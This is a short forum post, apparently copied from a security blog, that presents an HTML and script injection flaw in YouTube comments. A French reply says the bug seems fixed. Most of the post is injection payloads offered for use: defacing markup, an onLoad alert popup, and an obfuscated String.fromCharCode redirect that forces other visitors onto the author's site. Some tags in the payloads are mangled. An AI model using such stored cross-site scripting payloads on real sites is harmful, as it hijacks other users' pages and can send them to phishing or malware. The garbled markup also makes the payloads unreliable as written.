Hello, in this article I’ll show you a little vulnerability in YOUTUBE.com more exactly it’s about HTML Code Injection.
What you can do with this? Hmm, you can use all HTML BB Codes in comments. And bonus a BIG popup.
How you can activate HTML in comments? It’s very simple. With:
<script>HTML CodeExample:
<script><h1> Visit Insecurity.Ro – ISR Security Team <blink><marquee><br><br>TinKodeAnd for popup:
<script><BODY onLoad=”alert(‘Visit Insecurity.ro – TinKode’);”If you want to make redirect:
<script>Zbody onLoad=”document.write(‘<script>window.location = String.fromCharCode(104, 116, 116, 112, 58, 47, 47, 119, 119, 119, 46, 105, 110, 115, 101, 99, 117, 114, 105, 116, 121, 46, 114, 111, 47);</script>’);”;If you add this comment the page will be auto redirected to www.insecurity.ro

http://blog.insecurity.ro/
Jill a écrit:A priori bug fixed on peut plus publier ce genre de commentaires...

Utilisateurs parcourant ce forum: Aucun utilisateur enregistré et 3 invités